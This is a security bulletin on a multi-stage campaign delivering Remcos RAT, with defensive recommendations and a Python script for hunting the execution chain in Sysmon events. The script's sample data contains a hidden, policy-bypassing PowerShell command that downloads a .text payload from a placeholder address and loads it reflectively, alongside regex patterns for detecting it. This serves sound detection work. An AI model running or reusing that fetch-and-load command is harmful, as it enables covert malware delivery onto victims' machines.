New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack
Summary:
Securonix Threat Research has identified a new multi-stage malware campaign, tracked as SHADOW#REACTOR, that chains obfuscated scripts with in-memory (fileless) execution of the payload to deploy the Remcos RAT. The infection begins when a user runs a malicious VBScript, typically delivered through social engineering. The script acts as a launcher: it suppresses errors and invokes a PowerShell stager. The PowerShell stage downloads the payload in fragments from a remote command-and-control server as plain text (.text) files, reassembles them in memory into a .NET Reactor-protected assembly, and loads that assembly reflectively, so the executable itself is never exposed on disk to static detection. The final stage abuses a legitimate Windows tool, MSBuild.exe, to execute the Remcos RAT payload, giving the attackers persistent remote control, keylogging, and file system access. The campaign is notable for its self-healing design, in which the loader repeatedly re-downloads payload fragments when integrity checks fail, and for the "junk" PowerShell commands it interleaves to generate noise and hinder analysis.
Security Officer Comments:
This campaign marks a notable step up in how commodity malware is delivered. Remcos RAT is a well-known tool usually associated with lower-tier cybercrime, but the SHADOW#REACTOR loader shows a level of operational care designed to get past traditional endpoint protection. Smuggling binary code inside .text files lets the malware slip past email gateways and network scanners that flag executable content, and the reliance on living-off-the-land binaries such as wscript.exe and MSBuild.exe means detection logic based solely on known-bad file hashes will likely fail. The campaign appears opportunistic and financially motivated, targeting a broad range of industries rather than specific verticals, so organizations with small security teams or those relying on signature-based antivirus are at the highest risk. The self-healing network behavior also implies that a temporary network block is not enough to stop an infection once the initial script is running: the malware is programmed to wait and retry, so the loader persists on the endpoint until it is removed.
Suggested Corrections:
- Increase user awareness of script-based threats: Educate users on the risks of executing downloaded scripts and emphasize caution around unexpected files, “update” prompts, or document-related artifacts received via web downloads or untrusted sources.
- Validate script execution sources: Restrict or monitor execution of VBS, JS, and PowerShell scripts, particularly those originating from user-writable locations such as %TEMP%, browser cache directories, or downloaded file paths.
- Harden endpoint detection and response (EDR): Ensure EDR solutions are capable of detecting suspicious script interpreter behavior, including anomalous parent-child process chains such as wscript.exe → powershell.exe → msbuild.exe, and reflective .NET assembly loading patterns.
- Leverage advanced PowerShell and scripting telemetry: Enable enhanced PowerShell logging (ScriptBlock logging, Module logging, command-line auditing) to surface heavily obfuscated, multi-stage payload reconstruction activity.
- Monitor for LOLBin abuse: Actively hunt for misuse of trusted binaries such as wscript.exe, powershell.exe, mshta.exe, and MSBuild.exe, especially when invoked from non-standard execution paths or user contexts.
- Watch for persistence artifacts: Monitor for suspicious Startup folder shortcuts, scheduled task creation, and benign-looking executables written to %TEMP%, ProgramData, or user profile directories.
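As an added example (not code from the Securonix report or the article), the following Python applies three of the hunts above to process-creation telemetry: it reconstructs process ancestry from Sysmon Event ID 1-style records and flags the wscript.exe → powershell.exe → msbuild.exe chain, PowerShell command lines carrying markers of the .text staging and reflective load, and trusted binaries handed a script or project under a user-writable path. The events, GUIDs, file paths and the 198.51.100.10 address are constructed placeholders, not captured telemetry; the chain check tolerates an intermediate process (for example cmd.exe) between stages, which goes slightly beyond the exact chain quoted in the bulletin.

```python
"""Hunting the SHADOW#REACTOR-style execution chain in Sysmon EID 1 records.
Added illustration; the sample events below are constructed, not real telemetry."""
import re
from typing import Dict, List, Sequence

# Constructed sample events (subset of Sysmon Event ID 1 fields). g2..g4 model the
# chain from the bulletin; g5/g6 model a developer build so the rules have a benign case.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\alice\Downloads\invoice.vbs"'},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -nop -w hidden -ep bypass -c "
                     "\"$p=(New-Object Net.WebClient).DownloadString('http://198.51.100.10/part1.text');"
                     "[Reflection.Assembly]::Load([Convert]::FromBase64String($p))\"")},
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stage.proj"},
    {"ProcessGuid": "g5", "ParentProcessGuid": "g0",
     "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": "devenv.exe"},
    {"ProcessGuid": "g6", "ParentProcessGuid": "g5",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj"},
]

CHAIN = ("wscript.exe", "powershell.exe", "msbuild.exe")

# Command-line markers of the staging behaviour described in the bulletin. These only
# fire when command-line auditing is enabled, which is why the logging advice matters.
PS_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "text_stage_download": re.compile(r"DownloadString\([^)]*\.text", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}

LOLBINS = {"wscript.exe", "cscript.exe", "mshta.exe", "msbuild.exe", "powershell.exe"}
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|AppData|ProgramData)\\", re.I)


def image_name(path: str) -> str:
    """Lower-case file name of an Image path."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(events: Sequence[Dict[str, str]], guid: str) -> List[str]:
    """Process names from the given process up to the root (child first), following
    ParentProcessGuid; stops at an unknown parent or a cycle."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    names, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        names.append(image_name(by_guid[guid]["Image"]))
        guid = by_guid[guid]["ParentProcessGuid"]
    return names


def contains_in_order(names: Sequence[str], chain: Sequence[str]) -> bool:
    """True if every element of chain appears in names in that order; processes in
    between the stages are tolerated."""
    it = iter(names)
    return all(any(n == step for n in it) for step in chain)


def find_chain_hits(events: Sequence[Dict[str, str]], chain=CHAIN) -> List[str]:
    """ProcessGuids of processes that end a chain present in their ancestry."""
    hits = []
    for e in events:
        root_first = list(reversed(lineage(events, e["ProcessGuid"])))
        if image_name(e["Image"]) == chain[-1] and contains_in_order(root_first, chain):
            hits.append(e["ProcessGuid"])
    return hits


def powershell_indicators(cmdline: str) -> List[str]:
    """Names of the staging markers found in a PowerShell command line."""
    return [name for name, rx in PS_INDICATORS.items() if rx.search(cmdline)]


def lolbin_from_user_writable(event: Dict[str, str]) -> bool:
    """Trusted binary launched with a script/project under a user-writable path."""
    return image_name(event["Image"]) in LOLBINS and bool(USER_WRITABLE.search(event["CommandLine"]))


def triage(events: Sequence[Dict[str, str]]) -> Dict[str, List[str]]:
    """Run all three checks; returns findings keyed by ProcessGuid."""
    findings: Dict[str, List[str]] = {}
    for guid in find_chain_hits(events):
        findings.setdefault(guid, []).append("chain:" + "->".join(CHAIN))
    for e in events:
        if image_name(e["Image"]) == "powershell.exe":
            for ind in powershell_indicators(e["CommandLine"]):
                findings.setdefault(e["ProcessGuid"], []).append("ps:" + ind)
        if lolbin_from_user_writable(e):
            findings.setdefault(e["ProcessGuid"], []).append("lolbin_user_writable")
    return findings


if __name__ == "__main__":
    for guid, tags in triage(SAMPLE_EVENTS).items():
        print(guid, tags)
```

On a real estate the same functions run over events exported from the Sysmon operational log or the SIEM; the benign devenv.exe → MSBuild.exe build in the sample is there to show that the chain rule, unlike a plain "MSBuild.exe started" alert, does not fire on developer workstations.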
Link(s):
https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html